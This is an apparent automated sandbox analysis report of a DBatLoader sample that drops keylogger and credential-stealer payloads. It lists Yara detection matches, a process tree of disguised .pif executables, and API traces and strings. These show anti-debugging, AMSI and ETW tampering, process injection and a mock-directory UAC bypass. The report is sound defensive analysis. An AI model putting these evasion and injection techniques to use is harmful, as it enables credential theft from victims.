Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000001.1805725850.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.4109202248.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.4109202248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000001.1805725850.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:58:17
Start date:	06/01/2025
Path:	C:\Users\Public\Libraries\Aiymwhpj.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Aiymwhpj.PIF"
Imagebase:	0x400000
File size:	1'161'216 bytes
MD5 hash:	6047499517804F1EA76B508CA469DE99
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:58:18
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:58:18
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6387b0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:58:18
Start date:	06/01/2025
Path:	C:\Users\Public\Libraries\jphwmyiA.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\jphwmyiA.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000002.4109307157.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000C.00000001.1881316189.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.4109307157.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000001.1881316189.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	15.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	17.7%
Total number of Nodes:	300
Total number of Limit Nodes:	20

Executed Functions

Function 0294F0A8 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,0295B3D5,?,?,?,000002F7,00000000,00000000), ref: 0294F0E2

Part of subcall function 0294881C: LoadLibraryA.KERNEL32(00000000,00000000,02948903), ref: 02948850
Part of subcall function 0294881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02948903), ref: 02948860
Part of subcall function 0294881C: GetProcAddress.KERNEL32(74B20000,00000000), ref: 02948879
Part of subcall function 0294881C: FreeLibrary.KERNEL32(74B20000,00000000,02992388,Function_000065D8,00000004,02992398,02992388,000186A3,00000040,0299239C,74B20000,00000000,00000000,00000000,00000000,02948903), ref: 029488E3

Part of subcall function 0294EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0294F3CC,UacInitialize,0299237C,0295B40C,UacScan,0299237C,0295B40C,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,ScanString), ref: 0294EFCE
Part of subcall function 0294EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0294EFE0

Part of subcall function 0294F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0294F034
Part of subcall function 0294F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0294F046
Part of subcall function 0294F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0294F05D

Part of subcall function 02937E10: GetFileAttributesA.KERNEL32(00000000,?,0294FD00,ScanString,0299237C,0295B40C,OpenSession,0299237C,0295B40C,ScanString,0299237C,0295B40C,UacScan,0299237C,0295B40C,UacInitialize), ref: 02937E1B

Part of subcall function 0293C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A868C8,?,02950032,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,ScanBuffer,0299237C,0295B40C,OpenSession), ref: 0293C2FB

Part of subcall function 0294DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0294E0B4), ref: 0294E01F
Part of subcall function 0294DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0294E0B4), ref: 0294E04F
Part of subcall function 0294DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0294E064
Part of subcall function 0294DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0294E090
Part of subcall function 0294DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0294E099

Part of subcall function 02937E34: GetFileAttributesA.KERNEL32(00000000,?,02952E7D,ScanString,0299237C,0295B40C,OpenSession,0299237C,0295B40C,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,Initialize), ref: 02937E3F

Part of subcall function 02937FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0295301B,OpenSession,0299237C,0295B40C,ScanString,0299237C,0295B40C,Initialize,0299237C,0295B40C,ScanString,0299237C,0295B40C), ref: 02937FD5

Part of subcall function 0294DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0294DFD2), ref: 0294DF3F
Part of subcall function 0294DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0294DF79
Part of subcall function 0294DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0294DFA6
Part of subcall function 0294DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0294DFAF

Part of subcall function 02948798: LoadLibraryW.KERNEL32(bcrypt,?,00000600,00000000,029923A4,0294A3BF,ScanString,029923A4,0294A774,ScanBuffer,029923A4,0294A774,Initialize,029923A4,0294A774,UacScan), ref: 029487AC
Part of subcall function 02948798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487C6
Part of subcall function 02948798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000600,00000000,029923A4,0294A3BF,ScanString,029923A4,0294A774,ScanBuffer,029923A4,0294A774,Initialize), ref: 02948802

Part of subcall function 02948704: LoadLibraryW.KERNEL32(amsi), ref: 0294870D
Part of subcall function 02948704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0294876C

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,0295B764), ref: 02954DEB

Part of subcall function 0294DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0294DEA0
Part of subcall function 0294DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0294DEF2), ref: 0294DEB6
Part of subcall function 0294DE78: NtDeleteFile.NTDLL(?), ref: 0294DED5

MoveFileA.KERNEL32(00000000,00000000), ref: 02954FEB
MoveFileA.KERNEL32(00000000,00000000), ref: 02955041

Strings

DllGetClassObject, xrefs: 0294F3E4, 0294F91B, 02959C74, 0295A944
psapi, xrefs: 0295A552
NtQuerySystemInformation, xrefs: 0295A4D5
EtwEventWrite, xrefs: 0295ACA7
UacInitialize, xrefs: 0294F36F, 0294FA36, 02950179, 0295418D, 02954603, 02954DFC, 029550B8, 0295546E, 0295595B, 02957471, 02958CB3, 029590CF
.url, xrefs: 0295590F
DlpNotifyPreDragDrop, xrefs: 02959FAC
RtlCreateQueryDebugBuffer, xrefs: 0295A23C
Initialize, xrefs: 0294F17B, 029500FD, 02950291, 0295042F, 029505D5, 0295088A, 02950F2D, 02951369, 02951813, 0295191D, 02952004, 02952336, 02952656, 0295298A, 02952B38, 02952E91, 0295324A, 029553F2, 02955787, 02955B83, 02955D48, 02955FB4, 029560F2, 029562F7, 0295726C, 02957F24, 02958F31, 02959B1C, 02959EBA, 0295A3E9, 0295A7A3, 0295ACEF
DllRegisterServer, xrefs: 0294F435, 0294F981
URL=file:", xrefs: 029568DB
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 02953ADC
[InternetShortcut], xrefs: 029568CC
bcrypt, xrefs: 0294F7A1, 0294F7D4, 0294F807, 02959E1C
advapi32, xrefs: 02958DC3
RetailTracerEnable, xrefs: 02959C0E
NtAlertResumeThread, xrefs: 0295A170
CreateProcessW, xrefs: 0295A56B
WinHttp.WinHttpRequest.5.1, xrefs: 02951C1D
DlpCheckIsCloudSyncApp, xrefs: 02959FDF
NtWriteVirtualMemory, xrefs: 0295AC0E
NtGetWriteWatch, xrefs: 0295A9DD
MiniDumpWriteDump, xrefs: 02958DD2
GET, xrefs: 02951D36
NtSetSecurityObject, xrefs: 02958DFA
SetUnhandledExceptionFilter, xrefs: 0295A76A
VirtualAllocEx, xrefs: 0295A66B
sppc, xrefs: 029599E5, 02959A18, 02959A4B, 02959A7E, 0295A98E, 0295A9C1
RtlAllocateHeap, xrefs: 0295A1A3, 0295A209
DlpGetArchiveFileTraceInfo, xrefs: 0295A012
EnumServicesStatusW, xrefs: 0295A520
EnumServicesStatusA, xrefs: 0295A511
BCryptRegisterProvider, xrefs: 0294F7F0
FlushInstructionCache, xrefs: 0295A737
DllGetActivationFactory, xrefs: 0294F94E
dbgcore, xrefs: 02958DD7, 02958DEB
ScanString, xrefs: 0294F1DF, 0294F46E, 0294F583, 0294F714, 0294F8A5, 0294FB2E, 0294FC6F, 029501F5, 02950E0D, 02950FA9, 029513E5, 02951600, 0295167C, 02951999, 02951CBF, 02951F88, 029523C5, 029527F6, 02952A06, 02952ABC, 02952DEB, 02952F0D, 029531CE, 02953619, 02954111, 02954587, 0295477C, 02955134, 029552CE, 02955613, 029559D7, 02956076, 0295685C, 029569D3, 02956A8B, 029570F8, 02957592, 029579F9, 0295801C, 02958AC3, 02958EB5, 0295929E, 0295965A, 02959958, 02959D13, 0295A0FA, 0295A2F1, 0295A89B
ieproxy, xrefs: 0294F3F5, 0294F41C, 0294F44C
UacScan, xrefs: 0294F30B, 0294F9BA, 0294FAB2, 02950081, 02950C67, 02951245, 02951BA7, 029522BA, 029534CB, 02953695, 029537F6, 0295396F, 02953AF2, 02953CC3, 02953DA1, 02953F2F, 0295443B, 029547F8, 02954A2D, 0295570B, 02955C7B, 02955E40, 0295616E, 0295627B, 029564D9, 029565D1, 02957174, 02957516, 0295772D, 029578C0, 02957B14, 02957FA0, 02958129, 02958282, 02958428, 029585B5, 02958749, 029588C8, 02958B3F, 02958FAD, 029591C7, 029593A8, 0295951C, 02959752, 0295A5C2
MiniDumpReadDumpStream, xrefs: 02958DE6
FX.c, xrefs: 02954B2F
C:\Users\Public\aken.pif, xrefs: 02954F85
lld.SLITUTEN, xrefs: 02953EEC
IconIndex=, xrefs: 02956931
NtReadVirtualMemory, xrefs: 0295AB0F
C:\Windows\System32\, xrefs: 0294FCEB, 029574EF, 02958237
smartscreenps, xrefs: 0294F932, 0294F965, 0294F998
SLGatherMigrationBlob, xrefs: 0295A977
kernel32, xrefs: 0295A64F, 0295A682, 0295A6B5, 0295A6E8, 0295A71B, 0295A74E, 0295A781
C:\\Windows \\SysWOW64\\, xrefs: 02953F02, 02954316
EnumServicesStatusExW, xrefs: 0295A53E
I_QueryTagInformation, xrefs: 02958DBE
psapi, xrefs: 02959CBE
Advapi, xrefs: 0295A516, 0295A525, 0295A534, 0295A543, 0295A57F, 0295A58E, 0295A59D
SLLoadApplicationPolicies, xrefs: 02959A67
FindCertsByIssuer, xrefs: 0294F54A
Ntdll, xrefs: 0295A4DA, 0295A4E9, 0295A4F8, 0295A507
OpenSession, xrefs: 0294F117, 0294F243, 0294FBF3, 0294FD14, 0294FE21, 0294FF39, 0295030D, 029504AB, 02950651, 02950771, 02950906, 029509FE, 02950BEB, 02950D91, 029510BF, 029512ED, 02951461, 02951584, 02951702, 02951AA8, 02951B2B, 02951C43, 02951D5B, 02951E67, 02952085, 029521A2, 02952441, 029524BD, 029526D2, 02952872, 02952BB4, 02952D6F, 02952F89, 029530A3, 029533D3, 02953872, 029539EB, 02953B6E, 02953FAB, 02954209, 02954343, 0295467F, 029548C7, 02954AA9, 02954B7D, 02954CE3, 02954E78, 029551B0, 0295534A, 029554EA, 0295568F, 02955803, 02955A53, 02955B07, 02955DC4, 02955EBC, 02956373, 0295664D, 029567C1, 02956957, 02956B07, 029571F0, 029573F5, 0295760E, 029576B1, 02957844, 02957C0C, 02957EA8, 029581A5, 029582FE, 029584A4, 02958631, 029587C5, 02958944, 02958A47, 02958BBB, 02958E39, 02959029, 0295931A, 029594A0, 029596D6, 029598DC, 02959AA0, 02959D8F, 02959E3E, 0295A07E, 0295A275, 0295A36D, 0295A81F, 0295ADE7
OpenProcess, xrefs: 0295A6D1
DlpGetWebSiteAccess, xrefs: 0295A045
NtAccessCheck, xrefs: 0295AB75
GZmMS1j, xrefs: 0294F0F0
mssip32, xrefs: 0294F68C, 0294F6BF, 0294F6F2, 02959CF1
SLGetEncryptedPIDEx, xrefs: 0295A9AA
NtQueryVirtualMemory, xrefs: 0295AA10
spp, xrefs: 02959C58, 02959C8B, 0295A928
NEO.c, xrefs: 02954879
NtWaitForSingleObject, xrefs: 0295A1D6
ntdll, xrefs: 02958DAF, 02958DFF, 02958E13, 0295A187, 0295A1BA, 0295A1ED, 0295A220, 0295A253, 0295A9F4, 0295AA27, 0295AA5A, 0295AA8D, 0295AAC0, 0295AAF3, 0295AB26, 0295AB59, 0295AB8C, 0295ABBF, 0295ABF2, 0295AC25, 0295AC58, 0295AC8B, 0295ACBE
EnumServicesStatusExA, xrefs: 0295A52F
CryptSIPGetInfo, xrefs: 0294F675
VirtualProtect, xrefs: 0295A69E
C:\\Users\\Public\\Libraries\\, xrefs: 02954F9A, 02954FF0, 02955CEB
EtwEventWriteEx, xrefs: 0295AC74
SLGetGenuineInformation, xrefs: 029599CE
CreateProcessAsUserW, xrefs: 0295A589, 0295A5A7
@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%, xrefs: 02954C82
sys.thgiseurt, xrefs: 02954300
NtOpenProcess, xrefs: 02958E0E
NtOpenObjectAuditAlarm, xrefs: 02958DAA
endpointdlp, xrefs: 02959FC3, 02959FF6, 0295A029, 0295A05C
tquery, xrefs: 02959C25
NtQueryInformationThread, xrefs: 0295AA43
GetProcessMemoryInfo, xrefs: 02959CA7
http, xrefs: 02951A09
CreateProcessA, xrefs: 0295A55C
LdrLoadDll, xrefs: 0295ABA8
CryptSIPVerifyIndirectData, xrefs: 0294F6A8, 02959CDA
SLGetSLIDList, xrefs: 02959A01
BCryptVerifySignature, xrefs: 0294F78A, 02959E05
HotKey=, xrefs: 02956A65
CreateProcessAsUserA, xrefs: 0295A57A
sppwmi, xrefs: 0295A95B
NtOpenSection, xrefs: 0295AA76
NtMapViewOfSection, xrefs: 0295AADC
LdrGetProcedureAddress, xrefs: 0295ABDB
WriteVirtualMemory, xrefs: 0295A704
SxTracerGetThreadContextDebug, xrefs: 02959C41, 0295A911
CryptSIPGetSignedDataMsg, xrefs: 0294F6DB
VirtualAlloc, xrefs: 0295A638
C:\Users\Public\alpha.pif, xrefs: 02954F6A
NtQuerySecurityObject, xrefs: 0295AB42
Kernel32, xrefs: 0295A561, 0295A570, 0295A5AC
UacUninitialize, xrefs: 02953152, 0295344F, 02953547, 02953D25, 029543BF
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 02953795
GetProxyDllInfo, xrefs: 0294F40B
NtOpenFile, xrefs: 0295AC41
TrustOpenStores, xrefs: 0294F4E4
RtlQueryProcessDebugInformation, xrefs: 0295A502
NtQueryDirectoryFile, xrefs: 0295A4F3
NtDeviceIoControlFile, xrefs: 0295A4E4
WintrustAddActionID, xrefs: 0294F517
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 0295026B
EnumProcessModules, xrefs: 0295A54D
wintrust, xrefs: 0294F4FB, 0294F52E, 0294F561
C:\Users\Public\, xrefs: 029535B7, 02955904, 02956B77
ScanBuffer, xrefs: 0294F2A7, 0294F5FF, 0294F829, 0294FD90, 0294FE9D, 0294FFB5, 02950389, 02950527, 029506CD, 029507ED, 02950982, 02950A7A, 02950CE3, 02950E89, 02951025, 0295113B, 029511C9, 029514DD, 0295177E, 0295188F, 02951A2C, 02951DD7, 02951EE3, 02952101, 0295221E, 02952539, 029525DA, 0295274E, 0295290E, 02952C30, 02953027, 029532C6, 02953357, 02953711, 029538F3, 02953A67, 02953BEA, 02953C66, 02953E1D, 02954027, 02954285, 029544B7, 029546FB, 02954943, 02954BF9, 02954D5F, 02954EF4, 0295522C, 02955566, 0295587F, 02955BFF, 02955F38, 029561EA, 029563EF, 02956555, 029566C9, 02956745, 029572E8, 02957379, 029577A9, 0295793C, 02957A98, 02957B90, 029580AD, 0295837A, 02958520, 029586AD, 02958841, 029589C0, 02958C37, 02958D2F, 0295914B, 02959424, 02959598, 029597CE, 02959860, 02959B98, 02959F36, 0295A465, 0295AD6B
BCryptQueryProviderRegistration, xrefs: 0294F7BD
